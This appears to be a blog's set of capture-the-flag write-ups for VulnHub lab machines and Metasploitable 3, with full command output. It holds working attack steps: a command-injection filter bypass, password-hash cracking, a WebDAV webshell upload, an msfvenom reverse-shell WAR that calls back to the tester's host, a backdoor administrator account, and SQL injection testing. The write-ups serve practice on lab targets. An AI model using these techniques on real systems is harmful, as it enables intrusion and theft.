After a bit I check and see that the spin binary was replaced based on the time stamp on the file and I am able to sudo to root without a password like a champion.
Once I escalate to root I check out the root directory for a flag or our next clues. I am presented with several files and clues.
root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls
flag1.txt.0xff jim melvin
root@puppet:/root/protovision# cat jimMrPotatoHead!Backdoors are not a...
root@puppet:/root/protovision# cat melvin Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# file flag1.txt.0xff
flag1.txt.0xff: ASCII text,with very long lines
root@puppet:/root/protovision# cat flag1.txt.0xff 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
So we have a hex string which I decode with xdd to a reversed base64 string and eventually the below YouTube file:
root@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHaroot@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r | rev | base64 -d
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
This leads us to our mandatory movie reference, this one being from this scene in WarGames where the characters are discussing back doors. “Mr. Potato Head! Backdoors are not secrets.” In this case we may have a password of “‘secrets’ for something?
The characters also go on to correctly guess ‘Joshua’ is the back door phrase in the movie, I keep this in my back pocket for later. Maybe another password?
Exploring the directory yields a jpeg and then leads us down a rabbit hole of hidden directories.
puppet:/root/protovision# ls -la
total 24
drwxr-xr-x 3 root root 4096Dec212016.
drwx------4 root root 4096Jan717:49..-rw-r--r--1 root root 401Dec212016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096Dec212016.I_have_you_now
-rw-r--r--1 root root 39Dec172016 jim
-rw-r--r--1 root root 53Dec172016 melvin
root@puppet:/root/protovision# cd .I_have_you_now/
root@puppet:/root/protovision/.I_have_you_now# ls
grauniad_1995-02-27.jpeg
root@puppet:/root/protovision/.I_have_you_now# file grauniad_1995-02-27.jpeg
grauniad_1995-02-27.jpeg: JPEG image data, JFIF standard 1.02
root@puppet:/root/protovision/.I_have_you_now# ls -la
total 84
drwxr-xr-x 3 root root 4096Dec212016.
drwxr-xr-x 3 root root 4096Dec212016..
drwxr-xr-x 3 root root 4096Dec182016.a
-r--------1 root root 71790Dec182016 grauniad_1995-02-27.jpeg
The jpeg file does have something hidden in the exif data:
root@kali2:~/Desktop# exiftool grauniad_1995-02-27.jpeg ExifToolVersionNumber:10.36FileName: grauniad_1995-02-27.jpegDirectory:.FileSize:70 kB
FileModificationDate/Time:2016:12:2222:53:22-05:00FileAccessDate/Time:2016:12:2222:53:25-05:00FileInodeChangeDate/Time:2016:12:2222:53:22-05:00FilePermissions: rwxr-xr-x
FileType: JPEG
FileTypeExtension: jpg
MIME Type: image/jpeg
ExifByteOrder:Big-endian (Motorola, MM)
X Resolution:72
Y Resolution:72ResolutionUnit: inches
Software:Acorn version 4.5.1ExifImageWidth:460ExifImageHeight:276
XP Comment: SHA1SUM 0a1f5d1ba9f15fd38b6e37734707bfd295a6795cPadding:(Binary data 2060 bytes,use-b option to extract)
JFIF Version:1.02ImageWidth:460ImageHeight:276EncodingProcess:Baseline DCT,Huffman coding
BitsPerSample:8ColorComponents:3
Y CbCrSubSampling:YCbCr4:2:0(22)ImageSize:460x276Megapixels:0.127
I was unable to decrypt the sha1 but I hold onto it for later, knowing that knightmare doesn’t generally make mistakes or put things in his challenges that aren’t connected.
I list out all the subdirectories and am damn glad I didn’t do this by hand.
Heading in I find several files which look to form a private key if assembled properly. At the bottom of this mess I find a file with the phrase ‘joshua’ which we earlier established must be useful for so mething as well as a gpg encrypted file that by the fle name could be an ssh key for a user ‘nleeson’.
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ls
my_world_you_are_persistent_try nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# file my_world_you_are_persistent_try
my_world_you_are_persistent_try: ASCII text
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat my_world_you_are_persistent_try
joshua
The gpg file decrypts to a private key file as suspected. The password that worked was actually ‘secret’ not ‘secrets’.
I test out the key and am able to SSH to the barringsbank host with the private key and passphrase ‘joshua’ from earlier.
root@puppet:/root# chmod 600 nick_key
root@puppet:/root# ssh -i nick_key nleeson@192.168.122.3Enter passphrase for key 'nick_key':Welcome to Ubuntu14.04.3 LTS (GNU/Linux4.4.0-57-generic x86_64)*Documentation: https://help.ubuntu.com/System information disabled due to load higher than 1.0The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in/usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
nleeson@barringsbank:~$
This system is pretty bare so I turn back to Puppet for clues. Taking a look at the Puppet configuration I see that I can edit /etc/puppet/manifests/site.pp and nodes.pp to include the wiggle module on barringsbanks. I make this change and wait a bit.
nleeson@barringsbank:~$ cd /tmp
nleeson@barringsbank:/tmp$ ./spin
nleeson@barringsbank:/tmp$ sudo -s
root@barringsbank:/tmp# cd /root
root@barringsbank:/root# ls
me.jpeg
Now we have another image file which I pull down locally and run steghide against. We’ve come full circle and the term ‘reticulating splines’ was the passphrase.
root@kali:/var/www/html# steghide extract -sf me.jpeg Enter passphrase:
wrote extracted data to "primate_egyptian_flag.txt".
root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt 67414349674143496741434967414349674143496741434967414349674169434b34694c7555336235426963765a47497a4e5859694269636c526d626c5a4749684279636e556d636c686b430a6741434967414349674143496741434967414349674143496741434967414349674143494b386c4c7430534c7538464967414349674143496734534c734143496741434967414349674143490a674143496741434967414349674143496741434967414349674143496741434967414349674143494b34435967414349674143496763794a74347958663543586742434938424349674143490a663931586639315866393158663931586639315875307a4b7273434c67414349674143496741434967416943634243496734434c6741795867414349674143496741795867414358674143490a39305450393054503930545039305450393054503934796276396d4c666843496741434967414349674143494b774849674143493878335838394666663931586639315838783358703831580a3842434967414349674143496741434967414349674143496e346e6667414349674143496741434967414349676f4166674143496777486639775850383154503930545039774866393054500a6777464967414349674143496741434967414349674143496741434967414349674143496741434967414349674143494b384349673847497642794a2b424749674143496741794a2b4243490a676369666742434967414349674143496741434967414349674143496741434967414349674143496741434967414349674143494b38434967384749764243496741434963426d66764143490a765a47496b355759673457616864575967553259753947493139576567384764674d6e62766c47646878576430466d636e353262447067434b41794a743479586639315875304359674143490a673847646751575a704a486467556d646e6b6b434b4153496e4647626d7077637068476467636d62704a5864304258596a4269627642535a746c476467674764346c326367554761304269630a734233636852585a74427964764a486130425362764a6e5a676b5859334647496c5a3362744279623042434c6c4a585a6f424364704a474968424363314279636e3557616f524849346c57620a3042435a6c6c33627135575a67556d64686847493139576567554763766847494a42694c7a646d627068476467515859674d4864703947627768585a6749575a3342435a75466d43306c32620a7742585967556d596751476231393264675133596c42336368427963706847646734326267733259684a475a6c566d5a4b495864766c48496b3557596734326270526e6376424849304647610a6a563263674d57613046576276525864684279626b427962304243646c4e48496c4a5859674d58545742535a7a5647613042434c6c5233627542695a507067437551575a304657616a566d630a674d335a756c4761304243636c56326167384764675148616e563362674d58616f524849764e6e437351585a774258647742795a756c3263314279636c5258596b425864676b4864704a58640a4331474d6b3557595342434c754e6a5179314749765248497a746d6268684764676b6e6268316b434b34535a734233626c42484979396d5a6767325a31396d626c42795970315759756c485a0a354279617546476130424362686c32596c42336367456b434b346952554e45497a6c47613042795a756c47647a564764674933626d426965753557613256326167516d62684269576c5258650a685a6e436c68476467516d62684279636c646d626c78476268683259675532636c684764677747626842795a756c47647a394761674933626d427961786b576230427a5a67384764675533620a68424364755632596c4a48497a6c4761674933626d4269627a496d637442796230424364686847496c6847646759326267415861304253516734535a6a6c6d646b4647496c786d59685648620a765a47496e355761723932627342535a7946474931395765675957616749585a305258613352484979394749444a565367343262675557624b5158614942694c6c4e6d6268523363704e33630a30564762773132624442434c7539474976646b434b34535a6e35575a737857596f4e6d436c6847646751575a30564762773132626a42535a324647616749336267516e6270684749684269630a7a526d626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c783259796c3259675547613042535a0a676f77507534694c75343262705233596c356d62764e47496c684764674d334a304647615842694c7555544f35454449444a6b51676b79516f414361304a33624f42535a6f526c43756c45490a674143496741434967414349674143496741434967414349674143496741434967414349674143496741434967414349674143496741434967414349674143496741434967414349674143490a3d6f515a794657623068325a70353253743043490a
Looks like hex again, which then decodes to another reversed base64 string. At last, the final flag:
What an awesome, intense, and comprehensive challenge! Thanks to knightmare for making this and to g0tm1lk and the whole vulnhub community for hosting this one! Until next time.
Each VM has a landing page which describes the challenge and number of flags:
I. Discovery
I started off with an nmap scan and didn’t turn up anything other than the standard web and SSH ports.
root@kali~# nmap -sV 172.16.94.143StartingNmap7.25BETA2( https://nmap.org ) at 2016-12-06 09:59 ESTNmap scan report for172.16.94.143Hostis up (0.00040s latency).Not shown:997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH7.2(FreeBSD20160310; protocol 2.0)80/tcp open http Apache httpd 2.4.23((FreeBSD)OpenSSL/1.0.2j-freebsd PHP/5.6.27)443/tcp open ssl/http Apache httpd 2.4.23((FreeBSD)OpenSSL/1.0.2j-freebsd PHP/5.6.27)
MAC Address:00:0C:29:D5:71:50(VMware)ServiceInfo: OS:FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed.Please report any incorrect results at https://nmap.org/submit/ .Nmapdone:1 IP address (1 host up) scanned in17.06 seconds
I ran Nikto next but did not get anything back so fired up Dirbuster which turned up a scanner.php page pretty quickly.
II. Command Injection
Firing up Burp and sending the request to repeater screams command injection.
Bit of a troll here, tried several tactics and all gave me this result.
Eventually I found that a carriage return would bypass the filter.
Here is the contents of scanner.php which shows the characters being filtered.
<html><head><title>S C A N N 3 R</title><linkrel="stylesheet"href="styles.css"type="text/css"/></head><body><divclass="container"><formmethod="POST"action=""><inputclass="form"type="text"name="host"value="127.0.0.1"/><inputclass="button"type="submit"value="Scan Target"/></form><?php
if(isset($_POST['host'])){
$cmd ="/usr/local/bin/nmap -F -sT ".$_POST['host'];
echo "<pre>Command: $cmd\n\n</pre>";if(strpos($cmd,";")!== FALSE || strpos($cmd,"|")!== FALSE || strpos($cmd,"&")!== FALSE){
echo "<pre>Nope. Good try though... ?</pre>\n";}else{
$output = shell_exec($cmd);
echo "<pre>$output</pre>";}}?><imgclass="logo"src="logo.png"></div></body></html></pre><imgclass="logo"src="logo.png"></div></body></html>
I issued a quick command to locate all 3 flags, next I set out to grab each one.
I found flag 1 hiding in the web root with the following commands.
ls
index.html
k1ngd0m_k3yz
logo.png
s1kr3t
scanner.php
styles.css
ls s1kr3t
flag.txt
cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
Flag 2
For flag 2 I had to dig around the file system a bit more and figure out a password to SSH in. I issued the following commands which confirmed that I had to gain access as the ‘craven’ user to read the flag and also gave me a hint and reminder file.
ls -la /usr/home/craven/
drwxr-xr-x 2 craven craven 512Nov919:58.
drwxr-xr-x 4 root wheel 512Nov501:59..-rw-r--r--1 craven craven 1055Nov501:59.cshrc
-rw-------1 craven craven 5Nov720:24.gdb_history
-rw-r--r--1 craven craven 60Nov720:36.gdbinit
-rw-r--r--1 craven craven 254Nov501:59.login
-rw-r--r--1 craven craven 163Nov501:59.login_conf
-rw-------1 craven craven 379Nov501:59.mail_aliases
-rw-r--r--1 craven craven 336Nov501:59.mailrc
-rw-r--r--1 craven craven 802Nov501:59.profile
-rw-------1 craven craven 281Nov501:59.rhosts
-rw-r--r--1 craven craven 978Nov501:59.shrc
-r--------1 craven craven 46Nov601:30 flag.txt
-rw-r--r--1 craven craven 119Nov502:23 hint.txt
-rw-r--r--1 craven craven 77Nov502:20 reminders.txt
cat /usr/home/craven/hint.txt
Keep forgetting my password, so I made myself a hint.Passwordis three digits followed bymy
pet's name and a symbol.
cat /usr/home/craven/reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha
OK, it looks like I need to create a wordlist with 3 numbers, the pet name of qwerty and a special character. The Crunch tool can do this for me. The command below gives me only 10 character long results starting with 3 digits, followed by the pet name and a special character.
crunch 1010-t %%%qwerty^> craven.txt
Crunch will now generate the following amount of data:363000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines:33000
Now what can I use this for since the instructions said no SSH bruteforcing is needed? Back to the webroot I found snippets from the /etc/passwd and /etc/master.passwd (which is the FreeBSD shadow file equivalent) files.
unshadow passwd shadow > to_crack
cat to_crack
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002:User&:/home/craven:/bin/sh
john --wordlist=craven.txt to_crack
john --show to_crack
craven:931qwerty?:1002:1002:User&:/home/craven:/bin/sh
1 password hash cracked,0 left
ls k1ngd0m_k3yz master passwd cat k1ngd0m_k3yz/passwd craven:*:1002:1002:User&:/home/craven:/bin/sh cat k1ngd0m_k3yz/master craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User&:/home/craven:/bin/sh
I saved down the files, unshadowed them and threw the file into John with my fancy wordlist.
unshadow passwd shadow > to_crack
cat to_crack
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002:User&:/home/craven:/bin/sh
john --wordlist=craven.txt to_crack
john --show to_crack
craven:931qwerty?:1002:1002:User&:/home/craven:/bin/sh
1 password hash cracked,0 left
With that password I was able to SSH in and grab the second flag.
I took the easy route here and also got a bit lucky. I ran strings against the binary and focused on this section.
%s [file to read]Checking file type...Symbolic links not allowed!Checkingif flag file...
flag
Nope.Can't let you have the flag.
Great! Printing file contents...
Win, here's your flag:
So based on this it looked like I may be able to read the file if I point the binary at another file without ‘flag’ in the filename and creating with a symlink.
$ cd /tmp
$ln /home/vulnhub/flag.txt test
$ cd /home/vulnhub/
$ ./reader /tmp/test
Checking file type...Checkingif flag file...Great!Printing file contents...Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
Sweet, it worked! There are likely other paths but this worked for me.
Thanks to superkojiman for putting this CTF together and making it available via Vulnhub. As always thanks to g0tmi1k and the entire Vulnhub team for maintaining these resources.
I was excited to see the latest version of Metasploitable provided us with a vulnerable Windows target to practice on. Building and configuring was not difficult once you have all of the dependencies down. I won’t get too deep into building the box but here are the basics of what I did:
Using a fresh install of Windows 10 I downloaded VirtualBox 5.0.30, Vagrant 1.8.7 and the latest version of Packer 0.12.0.
I decided to be lazy and use the included Powershell script to auto-build it, I just had to make the following dependency changes in the script so it would run.
and let this run for a while to pull in all of the configurations. Once this completed I loaded it in VirtualBox and logged in with the credentials vagrant/vagrant to make sure it was working properly. I then exported from VirtualBox as an .ova and imported into my VMware lab set up.
If you have any issues with the set up feel free to leave a comment or hit me up on Twitter.
Here’s a quick walk through for one path to local access as well as privilege escalation using mostly manual techniques.
I started off with an nmap scan of all ports to identify running services.
root@mrb3n:~# nmap -sV -p--T4 192.168.253.143StartingNmap6.49BETA4( https://nmap.org ) at 2016-12-03 17:22 ESTNmap scan report for192.168.253.143Hostis up (0.00038s latency).Not shown:65518 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH7.1(protocol 2.0)80/tcp open http Microsoft HTTPAPI httpd 2.0(SSDP/UPnP)1617/tcp open unknown
3000/tcp open http WEBrick httpd 1.3.1(Ruby2.3.1(2016-04-26))4848/tcp open ssl/appserv-http?5985/tcp open http Microsoft HTTPAPI httpd 2.0(SSDP/UPnP)8022/tcp open http ApacheTomcat/Coyote JSP engine 1.18080/tcp open http-proxy GlassFishServerOpenSourceEdition4.08282/tcp open http ApacheTomcat/Coyote JSP engine 1.18484/tcp open http Jetty winstone-2.88585/tcp open http Apache httpd 2.2.21((Win64) PHP/5.3.10 DAV/2)9200/tcp open wap-wsp?49153/tcp open msrpc MicrosoftWindows RPC
49154/tcp open msrpc MicrosoftWindows RPC
49231/tcp open unknown
49235/tcp open unknown
Port 8585 caught my eye as this could be a WAMP installation with webdav possibly enabled.
I browsed to the URL and saw an uploads directory right away, this looked promising.
There is nothing in our uploads directory…yet…
Using Cadaver which is command-line Webdav client I was able to upload the following simple PHP webshell unauthenticated. This webshell lets you run one-off commands and is pretty cumbersome/tedious to work with but its a start!
root@mrb3n:~/Desktop/metasploitable3# cadaver http://192.168.253.143:8585/uploads/
dav:/uploads/> put shell.php
Uploading shell.php to `/uploads/shell.php':
Progress: [=============================>] 100.0% of 38 bytes succeeded.
dav:/uploads/>
A quick test to confirm command execution:
root@mrb3n:~/Desktop/metasploitable3# curl http://192.168.253.143:8585/uploads/shell.php?e=ipconfigWindows IP ConfigurationEthernet adapter LocalAreaConnection4:Connection-specific DNS Suffix.: localdomain
Link-localIPv6Address.....: fe80::ad02:4595:821a:bb65%16IPv4Address...........:192.168.253.143SubnetMask...........:255.255.255.0DefaultGateway.........:Ethernet adapter LocalAreaConnection3:Connection-specific DNS Suffix.: localdomain
Link-localIPv6Address.....: fe80::69d3:300:90dd:c46%15IPv4Address...........:192.168.110.140SubnetMask...........:255.255.255.0DefaultGateway.........:192.168.110.2Tunnel adapter isatap.localdomain:MediaState...........:Media disconnected
Connection-specific DNS Suffix.: localdomain
I decided to use Weevely to generate a semi-interactive web shell and uploaded it to the target.
root@mrb3n:~/Desktop/metasploitable3# weevely generate pass123 /root/Desktop/metasploitable3/weevely.phpGenerated backdoor with password 'pass123'in'/root/Desktop/metasploitable3/weevely.php' of 1446byte size.
root@mrb3n:~/Desktop/metasploitable3# weevely http://192.168.253.143:8585/uploads/weevely.php pass123[+] weevely 3.2.0[+]Target:192.168.253.143:8585[+]Session:/root/.weevely/sessions/192.168.253.143/weevely_0.session
[+]Browse the filesystem or execute commands starts the connection
[+] to the target.Type:help for more information.
A netstat showed me multiple additional ports listening which explains the second NIC in the ipconfig command results earlier.
I had a look around at what other services are installed. Digging into the ‘Apache Software Foundation’ directory we find a Tomcat install along with the tomcat-users.xml file with cleartext credentials for the tomcat manager.
metasploitable3:C:\wamp\www\uploads $ cd "C:\Program Files"
metasploitable3:C:\Program Files $ dir
Volumein drive C isWindows2008R2VolumeSerialNumberis AC30-8D23Directory of C:\Program Files12/02/201609:26 PM <DIR>.12/02/201609:26 PM <DIR>..12/02/201608:47 PM <DIR>7-Zip12/02/201608:55 PM <DIR>ApacheSoftwareFoundation07/13/200907:20 PM <DIR>CommonFiles12/02/201609:26 PM <DIR> elasticsearch-1.1.111/20/201007:33 PM <DIR>InternetExplorer12/02/201608:55 PM <DIR>Java12/02/201608:58 PM <DIR> jenkins
12/02/201609:02 PM <DIR> jmx
11/26/201612:54 AM <DIR>OpenSSH11/26/201612:54 AM <DIR>Oracle12/02/201609:11 PM <DIR>Rails_Server12/02/201608:48 PM <DIR>ReferenceAssemblies11/20/201007:33 PM <DIR>WindowsMail07/13/200909:37 PM <DIR>Windows NT
12/02/201609:01 PM <DIR> wordpress
The server.xml file tells us that Tomcat is running on port 8282:
metasploitable3:C:\Program Files\Apache SoftwareFoundation\tomcat\apache-tomcat-8.0.33\conf $ more server.xml
<?xml version='1.0' encoding='utf-8'?><!--Licensed to the ApacheSoftwareFoundation(ASF) under one or more
contributor license agreements.See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the ApacheLicense,Version2.0(the "License"); you may notusethis file exceptin compliance with
the License.You may obtain a copy of the License at
..........................snip...............................................<!-- A "Connector" represents an endpoint by which requests are received
and responses are returned.Documentation at :Java HTTP Connector:/docs/config/http.html (blocking & non-blocking)Java AJP Connector:/docs/config/ajp.html
APR (HTTP/AJP)Connector:/docs/apr.html
Define a non-SSL/TLS HTTP/1.1Connector on port 8080--><Connector port="8282" protocol="HTTP/1.1"
connectionTimeout="20000"
redirectPort="8443"/><!-- A "Connector"using the shared thread pool--
Logging in to the Tomcat manager with the credentials sploit:sploit I am able to deploy a malicious WAR file to obtain a reverse shell.
I create a WAR backdoor using msfvenom and unpack it to get the filename of the corresponding .jsp file.
root@mrb3n:~/Desktop/metasploitable3# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.130 LPORT=8443 -f war > shell.war
I deployed the WAR file and confirmed it was successful.
Browsing directly to the directory does not yield us anything, we still need to specify the exact .jsp file.
I next set up a netcat listener and browsed to: http://192.168.253.143:8282/shell/fmzbtohe.jsp
root@mrb3n:~/Desktop/metasploitable3# nc -lvnp 8443
listening on [any]8443...
connect to [192.168.253.130]from(UNKNOWN)[192.168.253.143]51065MicrosoftWindows[Version6.1.7601]Copyright(c)2009MicrosoftCorporation.All rights reserved.
I got a hit on my listener and, hey, a SYSTEM shell.
C:\Program Files\Apache SoftwareFoundation\tomcat\apache-tomcat-8.0.33>whoami
whoami
nt authority\system
I added an administrative user next to set up some persistence.
C:\Program Files\Apache SoftwareFoundation\tomcat\apache-tomcat-8.0.33>net user benr pass123 /add
net user benr pass123 /add
The command completed successfully.
C:\Program Files\Apache SoftwareFoundation\tomcat\apache-tomcat-8.0.33>net localgroup administrators benr /add
net localgroup administrators benr /add
The command completed successfully.
To get at the other services we need a route tot he 192.168.110.0/24 subnet. I set up some SSH port forwarding using my new administrative user.
Edited /etc/proxychains.conf and now I could access all services such as terminal services.
root@mrb3n:~/Desktop/metasploitable3# proxychains nmap -P0 -sT -p 3389 --open -oN tcp.nmap 192.168.110.140ProxyChains-3.1(http://proxychains.sf.net)StartingNmap6.49BETA4( https://nmap.org ) at 2016-12-04 12:26 ESTStats:0:00:02 elapsed;0 hosts completed (0 up),0 undergoing HostDiscoveryParallel DNS resolution of 1 host.Timing:About0.00%done|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Nmap scan report for192.168.110.140Hostis up (0.0091s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
I confirmed that I could log in:
root@mrb3n:~# proxychains rdesktop 192.168.110.140ProxyChains-3.1(http://proxychains.sf.net)Autoselected keyboard map en-us
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR:CredSSP:Initialize failed,do you have correct kerberos tgt initialized ?|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.
WARNING:Remote desktop does not support colour depth 24; falling back to 16
ERROR: SSL_read:5(Success)Disconnected due to network error, retrying to reconnect for70 minutes.|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR:CredSSP:Initialize failed,do you have correct kerberos tgt initialized ?|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.
This was just one quick and easy way to local access and ultimately escalate privileges to SYSTEM. I will add to this post in the future to highlight other paths without the use of Metasploit. I will also do a separate post on the many ways in using Metasploit because it is a great tool/way to start and gain confidence but should not replace honing your manual exploitation skill set.
The readme comes with the following note: Note: VMware users may have issues with the network interface doing down by default. We recommend (for once!) using Virtualbox.
Well, with a few steps we can get this working on VMware.
I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:
1) sudo su
2) mount /dev/sda1 /mnt
3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'4)Vim/mnt/etc/default/grub and edit the line
GRUB_CMDLINE_LINUX="" to read:
GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"5)Poweroff6)Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot intorescue mode.7)Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.8)Inthis shell type "update-grub"then type "exit"9)Select"execute a shell in the installer environment",then"poweroff"10)Remove the CD from the VM, boot to firmware and change the boot order back to the HDD.Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.
h/t to knightmare for pointing me towards this article:
Once that was done I was off and running. Started off with an nmap scan which gave me SSH and an Apache web server on a non-standard port.
root@mrb3n:~/Desktop# nmap -p- -T4 192.168.253.136StartingNmap6.49BETA4( https://nmap.org ) at 2016-11-19 19:45 EST
SYN StealthScanTiming:About12.53%done; ETC:20:00(0:13:02 remaining)Nmap scan report for192.168.253.136Hostis up (0.00021s latency).Not shown:65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
8008/tcp open http
MAC Address:00:0C:29:86:05:34(VMware)
Well, the whole web app is in Albanian so this will be an extra challenge.
root@mrb3n:~# curl -s http://192.168.253.136:8008/<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>HackDayAlbania2016</title><link rel="stylesheet" href="js/jquery-ui.css"><script src="js/jquery-3.1.1.min.js"></script><script src="js/jquery-ui.js"></script><style type="text/css">
body {
background-image: url("bg.png");
background-repeat:no-repeat;
background-size: cover;}.ui-draggable .ui-dialog-titlebar{
background-color:#f05b43;}.ui-dialog .ui-dialog-title{
color: white;}</style><script>
$(document).ready(function(){
$("#dialog").dialog();});</script></head><body><div id="dialog" title="Miresevini"><p>Ne qofte se jam UNE, e di se ku te shkoj ;)</p></div><!--OK ok, por jo ketu :)--></body>
A few very rough translations thanks to Google translate:
Miresevini=WelcomeNe qofte se jam UNE, e di se ku te shkoj =If I am, I know where to go;)
OK ok, por jo ketu =Ok ok, but not here
Fire Dirb against it and got a robots.txt file and not much else.
root@mrb3n:~# dirb http://192.168.253.136:8008/-----------------
DIRB v2.22ByTheDarkRaver-----------------
START_TIME:SatNov1922:25:482016
URL_BASE: http://192.168.253.136:8008/
WORDLIST_FILES:/usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS:4612----Scanning URL: http://192.168.253.136:8008/ ----+ http://192.168.253.136:8008/index.html (CODE:200|SIZE:750) ==> DIRECTORY: http://192.168.253.136:8008/js/ + http://192.168.253.136:8008/robots.txt (CODE:200|SIZE:702) + http://192.168.253.136:8008/server-status (CODE:403|SIZE:305) ----Entering directory: http://192.168.253.136:8008/js/ ----==> DIRECTORY: http://192.168.253.136:8008/js/external/ ==> DIRECTORY: http://192.168.253.136:8008/js/images/ + http://192.168.253.136:8008/js/index.html (CODE:200|SIZE:165) ----Entering directory: http://192.168.253.136:8008/js/external/ ----(!) WARNING:Directory IS LISTABLE.No need to scan it.(Use mode '-w'if you want to scan it anyway)----Entering directory: http://192.168.253.136:8008/js/images/ ----(!) WARNING:Directory IS LISTABLE.No need to scan it.(Use mode '-w'if you want to scan it anyway)-----------------
END_TIME:SatNov1922:25:512016
DOWNLOADED:9224- FOUND:4
All but one give us the same error message: /unisxcudkqjydw
Checking it out gives us a hint to another directory:
root@mrb3n:~# curl -s http://192.168.253.136:8008/unisxcudkqjydw/
IS there any /vulnbank/in there ???
Vulnbank is where we want to be:
root@mrb3n:~# curl -L http://192.168.253.136:8008/unisxcudkqjydw/vulnbank<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><title>Index of /unisxcudkqjydw/vulnbank</title></head><body><h1>Index of /unisxcudkqjydw/vulnbank</h1><table><tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/unisxcudkqjydw/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="client/">client/</a></td><td align="right">2016-05-23 00:27 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.253.136 Port 8008</address>
</body></html>
I move onward to the ‘client’ directory and am presented with a login page for the Very Secure Bank.
I throw a single quote in the username field and get the following error message:
I’m feeling lazy so I throw it into sqlmap but something was being filtered in the back end. I couldn’t get sqlmap to work with or without any tamper scripts aside from confirming the SQLi so I turned to Burp.
root@mrb3n:~# sqlmap -u 'http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/login.php'--data='username=*&password=test'--dbms=mysql --risk=3--level=5--dbs
